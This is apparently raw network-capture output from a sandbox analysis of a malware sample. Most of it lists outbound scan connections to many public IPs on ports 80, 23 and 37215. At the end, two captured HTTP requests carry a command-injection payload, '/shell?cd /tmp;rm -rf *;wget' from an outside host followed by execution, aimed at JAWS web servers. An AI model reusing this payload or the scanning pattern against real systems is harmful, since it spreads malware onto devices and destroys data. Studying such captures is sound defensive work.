                                                            Jan 26, 2024 15:31:10.030095100 CET5847280192.168.2.23113.238.244.181
                                                            Jan 26, 2024 15:31:10.030105114 CET5847280192.168.2.2398.130.254.69
                                                            Jan 26, 2024 15:31:10.030105114 CET5847280192.168.2.23163.199.105.13
                                                            Jan 26, 2024 15:31:10.030113935 CET5847280192.168.2.23184.151.110.141
                                                            Jan 26, 2024 15:31:10.030117989 CET5847280192.168.2.2354.210.108.44
                                                            Jan 26, 2024 15:31:10.030121088 CET5847280192.168.2.2348.255.213.156
                                                            Jan 26, 2024 15:31:10.030122995 CET5847280192.168.2.23108.140.168.155
                                                            Jan 26, 2024 15:31:10.030123949 CET5847280192.168.2.23142.159.108.163
                                                            Jan 26, 2024 15:31:10.030122042 CET5847280192.168.2.2370.201.130.163
                                                            Jan 26, 2024 15:31:10.030127048 CET5847280192.168.2.2318.240.140.90
                                                            Jan 26, 2024 15:31:10.030127048 CET5847280192.168.2.23131.98.236.92
                                                            Jan 26, 2024 15:31:10.030137062 CET5847280192.168.2.23116.109.159.181
                                                            Jan 26, 2024 15:31:10.030148029 CET5847280192.168.2.23136.174.230.87
                                                            Jan 26, 2024 15:31:10.030158043 CET5847280192.168.2.23204.102.55.188
                                                            Jan 26, 2024 15:31:10.030158043 CET5847280192.168.2.23142.77.175.7
                                                            Jan 26, 2024 15:31:10.030164003 CET5847280192.168.2.23152.205.217.142
                                                            Jan 26, 2024 15:31:10.030164957 CET5847280192.168.2.23200.176.78.111
                                                            Jan 26, 2024 15:31:10.030164957 CET5847280192.168.2.234.126.181.203
                                                            Jan 26, 2024 15:31:10.030164957 CET5847280192.168.2.239.46.236.200
                                                            Jan 26, 2024 15:31:10.030170918 CET5847280192.168.2.2373.145.200.88
                                                            Jan 26, 2024 15:31:10.030170918 CET5847280192.168.2.2348.78.27.210
                                                            Jan 26, 2024 15:31:10.030179024 CET5847280192.168.2.23186.82.223.63
                                                            Jan 26, 2024 15:31:10.030184031 CET5847280192.168.2.23212.176.143.180
                                                            Jan 26, 2024 15:31:10.030193090 CET5847280192.168.2.2395.195.34.65
                                                            Jan 26, 2024 15:31:10.030195951 CET5847280192.168.2.23126.221.206.250
                                                            Jan 26, 2024 15:31:10.030203104 CET5847280192.168.2.23170.128.129.51
                                                            Jan 26, 2024 15:31:10.030201912 CET5847280192.168.2.23161.191.0.196
                                                            Jan 26, 2024 15:31:10.030203104 CET5847280192.168.2.2384.161.113.149
                                                            Jan 26, 2024 15:31:10.030203104 CET5847280192.168.2.23113.188.97.162
                                                            Jan 26, 2024 15:31:10.030203104 CET5847280192.168.2.23157.23.186.169
                                                            Jan 26, 2024 15:31:10.030203104 CET5847280192.168.2.2319.139.198.92
                                                            Jan 26, 2024 15:31:10.030216932 CET5847280192.168.2.2369.33.81.239
                                                            Jan 26, 2024 15:31:10.030216932 CET5847280192.168.2.23107.244.110.192
                                                            Jan 26, 2024 15:31:10.030216932 CET5847280192.168.2.23194.82.97.109
                                                            Jan 26, 2024 15:31:10.030227900 CET5847280192.168.2.23220.197.61.46
                                                            Jan 26, 2024 15:31:10.030227900 CET5847280192.168.2.23187.111.124.163
                                                            Jan 26, 2024 15:31:10.030240059 CET5847280192.168.2.23102.153.48.204
                                                            Jan 26, 2024 15:31:10.030241013 CET5847280192.168.2.23114.237.18.241
                                                            Jan 26, 2024 15:31:10.030242920 CET5847280192.168.2.23170.200.65.76
                                                            Jan 26, 2024 15:31:10.030242920 CET5847280192.168.2.23115.145.139.170
                                                            Jan 26, 2024 15:31:10.030246973 CET5847280192.168.2.23203.195.3.73
                                                            Jan 26, 2024 15:31:10.030246973 CET5847280192.168.2.2343.82.214.85
                                                            Jan 26, 2024 15:31:10.030251026 CET5847280192.168.2.2376.194.191.145
                                                            Jan 26, 2024 15:31:10.030251026 CET5847280192.168.2.23179.119.50.42
                                                            Jan 26, 2024 15:31:10.030256033 CET5847280192.168.2.23167.68.134.231
                                                            Jan 26, 2024 15:31:10.030256033 CET5847280192.168.2.2382.64.88.65
                                                            Jan 26, 2024 15:31:10.030256033 CET5847280192.168.2.2354.76.111.252
                                                            Jan 26, 2024 15:31:10.030282021 CET5847280192.168.2.2327.164.88.104
                                                            Jan 26, 2024 15:31:10.030282974 CET5847280192.168.2.23139.63.115.40
                                                            Jan 26, 2024 15:31:10.030288935 CET5847280192.168.2.2348.195.188.181
                                                            Jan 26, 2024 15:31:10.030296087 CET5847280192.168.2.2339.253.64.187
                                                            Jan 26, 2024 15:31:10.030296087 CET5847280192.168.2.23122.200.183.211
                                                            Jan 26, 2024 15:31:10.030297995 CET5847280192.168.2.2354.219.176.71
                                                            Jan 26, 2024 15:31:10.030297995 CET5847280192.168.2.2377.165.179.95
                                                            Jan 26, 2024 15:31:10.030308008 CET5847280192.168.2.23109.12.34.4
                                                            Jan 26, 2024 15:31:10.030308962 CET5847280192.168.2.23223.107.39.9
                                                            Jan 26, 2024 15:31:10.030308962 CET5847280192.168.2.2377.145.15.54
                                                            Jan 26, 2024 15:31:10.030308962 CET5847280192.168.2.2338.218.46.96
                                                            Jan 26, 2024 15:31:10.030313015 CET5847280192.168.2.2370.202.116.146
                                                            Jan 26, 2024 15:31:10.030308962 CET5847280192.168.2.2332.85.151.25
                                                            Jan 26, 2024 15:31:10.030308962 CET5847280192.168.2.2347.202.18.229
                                                            Jan 26, 2024 15:31:10.030308962 CET5847280192.168.2.23211.9.126.133
                                                            Jan 26, 2024 15:31:10.030320883 CET5847280192.168.2.23165.164.87.79
                                                            Jan 26, 2024 15:31:10.030320883 CET5847280192.168.2.23138.174.37.157
                                                            Jan 26, 2024 15:31:10.030335903 CET5847280192.168.2.23223.82.66.141
                                                            Jan 26, 2024 15:31:10.030344963 CET5847280192.168.2.23198.156.135.103
                                                            Jan 26, 2024 15:31:10.030345917 CET5847280192.168.2.23106.182.129.63
                                                            Jan 26, 2024 15:31:10.030345917 CET5847280192.168.2.23149.212.236.235
                                                            Jan 26, 2024 15:31:10.030345917 CET5847280192.168.2.23102.233.223.73
                                                            Jan 26, 2024 15:31:10.030349970 CET5847280192.168.2.23218.156.125.107
                                                            Jan 26, 2024 15:31:10.030355930 CET5847280192.168.2.2324.29.195.189
                                                            Jan 26, 2024 15:31:10.030361891 CET5847280192.168.2.23208.185.198.107
                                                            Jan 26, 2024 15:31:10.030370951 CET5847280192.168.2.2396.112.142.35
                                                            Jan 26, 2024 15:31:10.030370951 CET5847280192.168.2.23165.26.70.202
                                                            Jan 26, 2024 15:31:10.030376911 CET5847280192.168.2.2334.13.43.198
                                                            Jan 26, 2024 15:31:10.030376911 CET5847280192.168.2.2348.49.31.227
                                                            Jan 26, 2024 15:31:10.030376911 CET5847280192.168.2.2376.171.17.14
                                                            Jan 26, 2024 15:31:10.030394077 CET5847280192.168.2.2362.41.176.190
                                                            Jan 26, 2024 15:31:10.030394077 CET5847280192.168.2.23140.127.19.197
                                                            Jan 26, 2024 15:31:10.030396938 CET5847280192.168.2.2341.99.220.34
                                                            Jan 26, 2024 15:31:10.030399084 CET5847280192.168.2.2353.216.253.121
                                                            Jan 26, 2024 15:31:10.030400991 CET5847280192.168.2.23186.93.31.243
                                                            Jan 26, 2024 15:31:10.030406952 CET5847280192.168.2.2398.92.40.176
                                                            Jan 26, 2024 15:31:10.030406952 CET5847280192.168.2.23210.226.246.223
                                                            Jan 26, 2024 15:31:10.030407906 CET5847280192.168.2.2312.39.172.91
                                                            Jan 26, 2024 15:31:10.030416965 CET5847280192.168.2.23110.205.62.147
                                                            Jan 26, 2024 15:31:10.030432940 CET5847280192.168.2.2378.109.156.13
                                                            Jan 26, 2024 15:31:10.030433893 CET5847280192.168.2.23109.24.170.241
                                                            Jan 26, 2024 15:31:10.030433893 CET5847280192.168.2.2320.29.121.200
                                                            Jan 26, 2024 15:31:10.030435085 CET5847280192.168.2.23130.142.86.57
                                                            Jan 26, 2024 15:31:10.030435085 CET5847280192.168.2.23202.158.215.33
                                                            Jan 26, 2024 15:31:10.030443907 CET5847280192.168.2.23184.45.142.18
                                                            Jan 26, 2024 15:31:10.030447006 CET5847280192.168.2.2312.7.249.127
                                                            Jan 26, 2024 15:31:10.030447006 CET5847280192.168.2.2347.189.76.161
                                                            Jan 26, 2024 15:31:10.030462027 CET5847280192.168.2.239.43.116.107
                                                            Jan 26, 2024 15:31:10.030467033 CET5847280192.168.2.2370.76.240.58
                                                            Jan 26, 2024 15:31:10.030469894 CET5847280192.168.2.23199.176.246.245
                                                            Jan 26, 2024 15:31:10.030472040 CET5847280192.168.2.23132.128.32.197
                                                            Jan 26, 2024 15:31:10.030472040 CET5847280192.168.2.2313.152.76.109
                                                            Jan 26, 2024 15:31:10.030472040 CET5847280192.168.2.23112.160.215.175
                                                            Jan 26, 2024 15:31:10.030472994 CET5847280192.168.2.234.25.204.122
                                                            Jan 26, 2024 15:31:10.030472994 CET5847280192.168.2.23118.151.53.114
                                                            Jan 26, 2024 15:31:10.030472994 CET5847280192.168.2.23132.63.135.71
                                                            Jan 26, 2024 15:31:10.030472994 CET5847280192.168.2.23116.200.76.239
                                                            Jan 26, 2024 15:31:10.030472994 CET5847280192.168.2.23173.42.153.56
                                                            Jan 26, 2024 15:31:10.030483961 CET5847280192.168.2.2369.240.106.10
                                                            Jan 26, 2024 15:31:10.030483961 CET5847280192.168.2.2335.9.242.70
                                                            Jan 26, 2024 15:31:10.030483961 CET5847280192.168.2.23186.154.2.210
                                                            Jan 26, 2024 15:31:10.030493975 CET5847280192.168.2.23152.225.151.202
                                                            Jan 26, 2024 15:31:10.030498028 CET5847280192.168.2.23130.28.97.204
                                                            Jan 26, 2024 15:31:10.030498028 CET5847280192.168.2.2367.191.212.163
                                                            Jan 26, 2024 15:31:10.030498028 CET5847280192.168.2.23121.154.24.93
                                                            Jan 26, 2024 15:31:10.030498028 CET5847280192.168.2.23219.98.131.230
                                                            Jan 26, 2024 15:31:10.030507088 CET5847280192.168.2.2335.27.172.172
                                                            Jan 26, 2024 15:31:10.030513048 CET5847280192.168.2.23207.45.167.161
                                                            Jan 26, 2024 15:31:10.030522108 CET5847280192.168.2.23177.80.34.238
                                                            Jan 26, 2024 15:31:10.030524015 CET5847280192.168.2.23176.73.1.250
                                                            Jan 26, 2024 15:31:10.030530930 CET5847280192.168.2.2381.100.226.242
                                                            Jan 26, 2024 15:31:10.030539989 CET5847280192.168.2.2391.240.10.100
                                                            Jan 26, 2024 15:31:10.030544996 CET5847280192.168.2.23191.37.178.2
                                                            Jan 26, 2024 15:31:10.030551910 CET5847280192.168.2.23108.44.89.29
                                                            Jan 26, 2024 15:31:10.030553102 CET5847280192.168.2.23106.57.59.26
                                                            Jan 26, 2024 15:31:10.030555010 CET5847280192.168.2.2352.153.211.220
                                                            Jan 26, 2024 15:31:10.030553102 CET5847280192.168.2.23174.0.80.151
                                                            Jan 26, 2024 15:31:10.030555010 CET5847280192.168.2.23176.156.249.88
                                                            Jan 26, 2024 15:31:10.030556917 CET5847280192.168.2.2377.97.89.196
                                                            Jan 26, 2024 15:31:10.030558109 CET5847280192.168.2.2360.30.152.254
                                                            Jan 26, 2024 15:31:10.030565023 CET5847280192.168.2.2361.113.60.195
                                                            Jan 26, 2024 15:31:10.030577898 CET5847280192.168.2.23213.201.173.165
                                                            Jan 26, 2024 15:31:10.030580997 CET5847280192.168.2.23170.83.50.168
                                                            Jan 26, 2024 15:31:10.030581951 CET5847280192.168.2.23221.12.77.44
                                                            Jan 26, 2024 15:31:10.030580997 CET5847280192.168.2.2371.164.4.172
                                                            Jan 26, 2024 15:31:10.030580997 CET5847280192.168.2.2395.14.122.94
                                                            Jan 26, 2024 15:31:10.030594110 CET5847280192.168.2.23190.243.189.191
                                                            Jan 26, 2024 15:31:10.030594110 CET5847280192.168.2.23145.7.106.78
                                                            Jan 26, 2024 15:31:10.030592918 CET5847280192.168.2.2386.198.171.219
                                                            Jan 26, 2024 15:31:10.030606985 CET5847280192.168.2.2368.212.235.97
                                                            Jan 26, 2024 15:31:10.030621052 CET5847280192.168.2.23112.141.168.74
                                                            Jan 26, 2024 15:31:10.030622959 CET5847280192.168.2.2358.63.45.185
                                                            Jan 26, 2024 15:31:10.030623913 CET5847280192.168.2.23109.70.31.51
                                                            Jan 26, 2024 15:31:10.030625105 CET5847280192.168.2.23166.253.76.125
                                                            Jan 26, 2024 15:31:10.030623913 CET5847280192.168.2.2337.214.217.156
                                                            Jan 26, 2024 15:31:10.030635118 CET5847280192.168.2.23105.221.253.49
                                                            Jan 26, 2024 15:31:10.030636072 CET5847280192.168.2.23216.43.45.90
                                                            Jan 26, 2024 15:31:10.030637026 CET5847280192.168.2.23151.30.198.118
                                                            Jan 26, 2024 15:31:10.030636072 CET5847280192.168.2.23194.16.138.22
                                                            Jan 26, 2024 15:31:10.030637026 CET5847280192.168.2.23148.223.211.183
                                                            Jan 26, 2024 15:31:10.030648947 CET5847280192.168.2.2320.144.168.77
                                                            Jan 26, 2024 15:31:10.030649900 CET5847280192.168.2.23130.78.171.61
                                                            Jan 26, 2024 15:31:10.030657053 CET5847280192.168.2.23187.34.191.26
                                                            Jan 26, 2024 15:31:10.030663967 CET5847280192.168.2.23220.131.140.236
                                                            Jan 26, 2024 15:31:10.030666113 CET5847280192.168.2.23194.94.19.79
                                                            Jan 26, 2024 15:31:10.030673981 CET5847280192.168.2.23150.28.156.68
                                                            Jan 26, 2024 15:31:10.030673981 CET5847280192.168.2.23133.185.125.112
                                                            Jan 26, 2024 15:31:10.030682087 CET5847280192.168.2.23117.241.150.170
                                                            Jan 26, 2024 15:31:10.030682087 CET5847280192.168.2.23181.50.235.32
                                                            Jan 26, 2024 15:31:10.030684948 CET5847280192.168.2.23104.179.32.237
                                                            Jan 26, 2024 15:31:10.030684948 CET5847280192.168.2.2371.172.245.229
                                                            Jan 26, 2024 15:31:10.030688047 CET5847280192.168.2.2370.173.192.30
                                                            Jan 26, 2024 15:31:10.030693054 CET5847280192.168.2.2376.105.60.88
                                                            Jan 26, 2024 15:31:10.030697107 CET5847280192.168.2.23161.162.111.164
                                                            Jan 26, 2024 15:31:10.030709028 CET5847280192.168.2.2318.146.44.134
                                                            Jan 26, 2024 15:31:10.030709028 CET5847280192.168.2.23162.158.100.86
                                                            Jan 26, 2024 15:31:10.030724049 CET5847280192.168.2.2398.11.14.20
                                                            Jan 26, 2024 15:31:10.030725002 CET5847280192.168.2.23193.25.85.6
                                                            Jan 26, 2024 15:31:10.030725002 CET5847280192.168.2.23192.246.246.2
                                                            Jan 26, 2024 15:31:10.030726910 CET5847280192.168.2.2327.64.162.13
                                                            Jan 26, 2024 15:31:10.030726910 CET5847280192.168.2.2332.97.193.239
                                                            Jan 26, 2024 15:31:10.030735016 CET5847280192.168.2.2319.181.154.157
                                                            Jan 26, 2024 15:31:10.030735016 CET5847280192.168.2.23174.69.45.16
                                                            Jan 26, 2024 15:31:10.030741930 CET5847280192.168.2.23102.121.43.8
                                                            Jan 26, 2024 15:31:10.030741930 CET5847280192.168.2.23161.10.104.144
                                                            Jan 26, 2024 15:31:10.030751944 CET5847280192.168.2.23221.245.244.186
                                                            Jan 26, 2024 15:31:10.030755997 CET5847280192.168.2.2338.0.65.205
                                                            Jan 26, 2024 15:31:10.030762911 CET5847280192.168.2.23139.38.99.17
                                                            Jan 26, 2024 15:31:10.030762911 CET5847280192.168.2.2349.192.82.27
                                                            Jan 26, 2024 15:31:10.030769110 CET5847280192.168.2.2339.173.126.170
                                                            Jan 26, 2024 15:31:10.030769110 CET5847280192.168.2.239.107.185.69
                                                            Jan 26, 2024 15:31:10.030769110 CET5847280192.168.2.23179.183.140.171
                                                            Jan 26, 2024 15:31:10.030771971 CET5847280192.168.2.2377.82.197.243
                                                            Jan 26, 2024 15:31:10.030776978 CET5847280192.168.2.23220.176.180.251
                                                            Jan 26, 2024 15:31:10.030786037 CET5847280192.168.2.23149.225.1.186
                                                            Jan 26, 2024 15:31:10.030802011 CET5847280192.168.2.2331.162.195.21
                                                            Jan 26, 2024 15:31:10.030802965 CET5847280192.168.2.2313.188.42.238
                                                            Jan 26, 2024 15:31:10.030802011 CET5847280192.168.2.2353.241.107.91
                                                            Jan 26, 2024 15:31:10.030805111 CET5847280192.168.2.23194.108.235.149
                                                            Jan 26, 2024 15:31:10.030805111 CET5847280192.168.2.2363.49.242.58
                                                            Jan 26, 2024 15:31:10.096395016 CET235872889.149.17.42192.168.2.23
                                                            Jan 26, 2024 15:31:10.104561090 CET2358728150.195.124.154192.168.2.23
                                                            Jan 26, 2024 15:31:10.110820055 CET235872847.16.144.134192.168.2.23
                                                            Jan 26, 2024 15:31:10.128870010 CET2358728206.162.161.73192.168.2.23
                                                            Jan 26, 2024 15:31:10.139626980 CET3721558984156.242.68.211192.168.2.23
                                                            Jan 26, 2024 15:31:10.148719072 CET805847254.89.88.113192.168.2.23
                                                            Jan 26, 2024 15:31:10.148788929 CET5847280192.168.2.2354.89.88.113
                                                            Jan 26, 2024 15:31:10.179383039 CET805847223.222.163.34192.168.2.23
                                                            Jan 26, 2024 15:31:10.179457903 CET5847280192.168.2.2323.222.163.34
                                                            Jan 26, 2024 15:31:10.193126917 CET2358728189.94.50.91192.168.2.23
                                                            Jan 26, 2024 15:31:10.205358982 CET805847245.41.94.55192.168.2.23
                                                            Jan 26, 2024 15:31:10.205441952 CET5847280192.168.2.2345.41.94.55
                                                            Jan 26, 2024 15:31:10.215214014 CET235872881.10.110.58192.168.2.23
                                                            Jan 26, 2024 15:31:10.230459929 CET235872860.117.55.252192.168.2.23
                                                            Jan 26, 2024 15:31:10.235268116 CET3721558984197.6.45.59192.168.2.23
                                                            Jan 26, 2024 15:31:10.235446930 CET805847213.35.255.215192.168.2.23
                                                            Jan 26, 2024 15:31:10.235519886 CET5847280192.168.2.2313.35.255.215
                                                            Jan 26, 2024 15:31:10.247874975 CET2358728115.8.162.95192.168.2.23
                                                            Jan 26, 2024 15:31:10.247932911 CET2358728175.203.248.98192.168.2.23
                                                            Jan 26, 2024 15:31:10.261487961 CET805847291.254.51.197192.168.2.23
                                                            Jan 26, 2024 15:31:10.262931108 CET2358728189.0.48.150192.168.2.23
                                                            Jan 26, 2024 15:31:10.264314890 CET3721558984197.4.147.88192.168.2.23
                                                            Jan 26, 2024 15:31:10.268820047 CET8058472170.83.50.168192.168.2.23
                                                            Jan 26, 2024 15:31:10.275984049 CET2358728223.195.1.175192.168.2.23
                                                            Jan 26, 2024 15:31:10.276024103 CET8058472102.153.48.204192.168.2.23
                                                            Jan 26, 2024 15:31:10.277637959 CET3721558984197.156.240.156192.168.2.23
                                                            Jan 26, 2024 15:31:10.306134939 CET2358728182.112.113.245192.168.2.23
                                                            Jan 26, 2024 15:31:10.306894064 CET3721558984156.250.186.227192.168.2.23
                                                            Jan 26, 2024 15:31:10.337603092 CET8058472166.253.76.125192.168.2.23
                                                            Jan 26, 2024 15:31:10.360455990 CET3721558984156.226.95.91192.168.2.23
                                                            Jan 26, 2024 15:31:10.964150906 CET5872823192.168.2.239.128.71.197
                                                            Jan 26, 2024 15:31:10.964154005 CET5872823192.168.2.2384.115.124.70
                                                            Jan 26, 2024 15:31:10.964150906 CET5872823192.168.2.2334.20.95.3
                                                            Jan 26, 2024 15:31:10.964154005 CET5872823192.168.2.2392.117.24.229
                                                            Jan 26, 2024 15:31:10.964155912 CET5872823192.168.2.23199.152.153.123
                                                            Jan 26, 2024 15:31:10.964154005 CET5872823192.168.2.23109.119.101.153
                                                            Jan 26, 2024 15:31:10.964159012 CET5872823192.168.2.2395.196.82.100
                                                            Jan 26, 2024 15:31:10.964159012 CET5872823192.168.2.23184.79.150.168
                                                            Jan 26, 2024 15:31:10.964162111 CET5872823192.168.2.23160.118.169.233
                                                            Jan 26, 2024 15:31:10.964163065 CET5872823192.168.2.23191.103.196.186
                                                            Jan 26, 2024 15:31:10.964162111 CET5872823192.168.2.2383.196.61.8
                                                            Jan 26, 2024 15:31:10.964219093 CET5872823192.168.2.2369.110.66.219
                                                            Jan 26, 2024 15:31:10.964219093 CET5872823192.168.2.2386.132.186.43
                                                            Jan 26, 2024 15:31:10.964219093 CET5872823192.168.2.23155.105.84.253
                                                            Jan 26, 2024 15:31:10.964219093 CET5872823192.168.2.23109.155.143.97
                                                            Jan 26, 2024 15:31:10.964219093 CET5872823192.168.2.23130.87.208.182
                                                            Jan 26, 2024 15:31:10.964219093 CET5872823192.168.2.23124.251.195.62
                                                            Jan 26, 2024 15:31:10.964219093 CET5872823192.168.2.23187.180.13.217
                                                            Jan 26, 2024 15:31:10.964243889 CET5872823192.168.2.2338.30.239.181
                                                            Jan 26, 2024 15:31:10.964243889 CET5872823192.168.2.232.30.31.53
                                                            Jan 26, 2024 15:31:10.964243889 CET5872823192.168.2.2353.45.82.169
                                                            Jan 26, 2024 15:31:10.964246988 CET5872823192.168.2.2353.76.112.58
                                                            Jan 26, 2024 15:31:10.964246988 CET5872823192.168.2.23177.104.166.130
                                                            Jan 26, 2024 15:31:10.964246988 CET5872823192.168.2.23109.128.230.65
                                                            Jan 26, 2024 15:31:10.964246988 CET5872823192.168.2.2338.198.48.168
                                                            Jan 26, 2024 15:31:10.964246988 CET5872823192.168.2.23182.55.197.101
                                                            Jan 26, 2024 15:31:10.964246988 CET5872823192.168.2.2378.170.47.64
                                                            Jan 26, 2024 15:31:10.964246988 CET5872823192.168.2.23184.171.196.173
                                                            Jan 26, 2024 15:31:10.964247942 CET5872823192.168.2.2350.145.93.34
                                                            Jan 26, 2024 15:31:10.964247942 CET5872823192.168.2.2394.206.193.84
                                                            Jan 26, 2024 15:31:10.964247942 CET5872823192.168.2.2332.205.203.42
                                                            Jan 26, 2024 15:31:10.964251995 CET5872823192.168.2.23201.212.205.104
                                                            Jan 26, 2024 15:31:10.964251995 CET5872823192.168.2.23220.197.124.189
                                                            Jan 26, 2024 15:31:10.964251995 CET5872823192.168.2.2361.10.72.19
                                                            Jan 26, 2024 15:31:10.964251995 CET5872823192.168.2.2345.95.64.54
                                                            Jan 26, 2024 15:31:10.964251995 CET5872823192.168.2.2317.43.62.137
                                                            Jan 26, 2024 15:31:10.964251995 CET5872823192.168.2.23142.13.28.70
                                                            Jan 26, 2024 15:31:10.964261055 CET5872823192.168.2.23208.131.43.166
                                                            Jan 26, 2024 15:31:10.964262009 CET5872823192.168.2.23202.211.28.97
                                                            Jan 26, 2024 15:31:10.964262009 CET5872823192.168.2.2334.70.202.177
                                                            Jan 26, 2024 15:31:10.964262009 CET5872823192.168.2.2361.221.57.240
                                                            Jan 26, 2024 15:31:10.964262009 CET5872823192.168.2.2389.156.202.92
                                                            Jan 26, 2024 15:31:10.964262009 CET5872823192.168.2.238.223.13.240
                                                            Jan 26, 2024 15:31:10.964262009 CET5872823192.168.2.23113.227.107.230
                                                            Jan 26, 2024 15:31:10.964268923 CET5872823192.168.2.238.20.17.77
                                                            Jan 26, 2024 15:31:10.964268923 CET5872823192.168.2.23222.12.50.119
                                                            Jan 26, 2024 15:31:10.964268923 CET5872823192.168.2.23197.146.67.191
                                                            Jan 26, 2024 15:31:10.964268923 CET5872823192.168.2.23102.64.110.160
                                                            Jan 26, 2024 15:31:10.964289904 CET5872823192.168.2.2376.213.167.172
                                                            Jan 26, 2024 15:31:10.964292049 CET5872823192.168.2.2371.21.154.238
                                                            Jan 26, 2024 15:31:10.964293003 CET5872823192.168.2.2344.111.253.108
                                                            Jan 26, 2024 15:31:10.964293003 CET5872823192.168.2.23208.106.221.172
                                                            Jan 26, 2024 15:31:10.964293003 CET5872823192.168.2.23149.72.227.124
                                                            Jan 26, 2024 15:31:10.964293003 CET5872823192.168.2.2393.146.146.218
                                                            Jan 26, 2024 15:31:10.964386940 CET5872823192.168.2.23130.0.69.132
                                                            Jan 26, 2024 15:31:10.964386940 CET5872823192.168.2.23203.252.51.207
                                                            Jan 26, 2024 15:31:10.964386940 CET5872823192.168.2.2378.28.155.219
                                                            Jan 26, 2024 15:31:10.964386940 CET5872823192.168.2.23155.72.175.129
                                                            Jan 26, 2024 15:31:10.964386940 CET5872823192.168.2.23209.66.238.67
                                                            Jan 26, 2024 15:31:10.964386940 CET5872823192.168.2.23186.75.104.211
                                                            Jan 26, 2024 15:31:10.964386940 CET5872823192.168.2.2331.213.83.99
                                                            Jan 26, 2024 15:31:10.964386940 CET5872823192.168.2.23165.251.58.250
                                                            Jan 26, 2024 15:31:10.964390993 CET5872823192.168.2.23108.133.140.184
                                                            Jan 26, 2024 15:31:10.964390993 CET5872823192.168.2.23126.122.190.138
                                                            Jan 26, 2024 15:31:10.964390993 CET5872823192.168.2.23121.125.93.227
                                                            Jan 26, 2024 15:31:10.964391947 CET5872823192.168.2.23147.10.45.210
                                                            Jan 26, 2024 15:31:10.964391947 CET5872823192.168.2.23183.204.239.255
                                                            Jan 26, 2024 15:31:10.964391947 CET5872823192.168.2.23109.82.252.201
                                                            Jan 26, 2024 15:31:10.964391947 CET5872823192.168.2.23137.157.199.43
                                                            Jan 26, 2024 15:31:10.964395046 CET5872823192.168.2.23195.140.10.230
                                                            Jan 26, 2024 15:31:10.964394093 CET5872823192.168.2.23118.254.46.38
                                                            Jan 26, 2024 15:31:10.964395046 CET5872823192.168.2.2391.50.9.134
                                                            Jan 26, 2024 15:31:10.964396954 CET5872823192.168.2.2312.54.87.226
                                                            Jan 26, 2024 15:31:10.964396954 CET5872823192.168.2.23109.102.238.37
                                                            Jan 26, 2024 15:31:10.964395046 CET5872823192.168.2.23201.194.24.49
                                                            Jan 26, 2024 15:31:10.964394093 CET5872823192.168.2.23176.146.89.232
                                                            Jan 26, 2024 15:31:10.964396954 CET5872823192.168.2.235.174.13.224
                                                            Jan 26, 2024 15:31:10.964395046 CET5872823192.168.2.23206.155.158.142
                                                            Jan 26, 2024 15:31:10.964396954 CET5872823192.168.2.23132.45.135.221
                                                            Jan 26, 2024 15:31:10.964396954 CET5872823192.168.2.2346.3.249.21
                                                            Jan 26, 2024 15:31:10.964396954 CET5872823192.168.2.23182.199.106.4
                                                            Jan 26, 2024 15:31:10.964396954 CET5872823192.168.2.23208.108.115.155
                                                            Jan 26, 2024 15:31:10.964395046 CET5872823192.168.2.23120.183.24.224
                                                            Jan 26, 2024 15:31:10.964396954 CET5872823192.168.2.2319.217.19.65
                                                            Jan 26, 2024 15:31:10.964395046 CET5872823192.168.2.23182.197.227.189
                                                            Jan 26, 2024 15:31:10.964396954 CET5872823192.168.2.2340.25.214.173
                                                            Jan 26, 2024 15:31:10.964396954 CET5872823192.168.2.23178.255.8.168
                                                            Jan 26, 2024 15:31:10.964395046 CET5872823192.168.2.23104.46.97.99
                                                            Jan 26, 2024 15:31:10.964396954 CET5872823192.168.2.23221.90.26.196
                                                            Jan 26, 2024 15:31:10.964395046 CET5872823192.168.2.23163.80.151.94
                                                            Jan 26, 2024 15:31:10.964396954 CET5872823192.168.2.23198.208.7.46
                                                            Jan 26, 2024 15:31:10.964396954 CET5872823192.168.2.23187.163.94.242
                                                            Jan 26, 2024 15:31:10.964396954 CET5872823192.168.2.23188.72.145.146
                                                            Jan 26, 2024 15:31:10.964396954 CET5872823192.168.2.23125.17.97.119
                                                            Jan 26, 2024 15:31:10.964395046 CET5872823192.168.2.23162.188.28.113
                                                            Jan 26, 2024 15:31:10.964401007 CET5872823192.168.2.23200.152.104.31
                                                            Jan 26, 2024 15:31:10.964396954 CET5872823192.168.2.23193.226.58.117
                                                            Jan 26, 2024 15:31:10.964395046 CET5872823192.168.2.23201.9.43.15
                                                            Jan 26, 2024 15:31:10.964401007 CET5872823192.168.2.23179.164.145.251
                                                            Jan 26, 2024 15:31:10.964395046 CET5872823192.168.2.2369.227.2.102
                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            0192.168.2.2342880207.58.183.980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:01.067805052 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:01.183103085 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:00 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1192.168.2.2351554173.194.223.12080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:01.075465918 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
